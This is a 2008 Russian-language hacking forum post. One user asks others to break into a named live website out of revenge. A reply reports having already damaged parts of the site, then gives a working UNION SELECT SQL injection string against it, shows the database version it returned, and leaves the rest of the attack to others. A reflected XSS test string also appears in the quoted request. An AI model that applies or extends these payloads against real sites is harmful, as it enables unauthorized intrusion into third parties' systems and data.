23.12.2008, 14:08
|
|
Новичок
Регистрация: 19.06.2007
Сообщений: 8
Провел на форуме:
218478
Репутация:
23
|
|
Сообщение от westside
Народ, я в sql inj новичёк, на этом сайте http://hyip365.net с лева есть форма поиска я ввожу туда xss "><script>alert('alert')</script> и выдаёт sql error. Помогите его взломать, админ сайта хакер, убил мой сайт, админ или американец или китаец, народ, покажите ему как русские хакеры взламывают!
Я над ним уже немного поработал, многие ссылки уже не работают....  тут скл-инъекция:
Код:
'=0) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,version(),30,31,32/*
версия 4.1.22-max-log
а дальше - сами....
|
|
|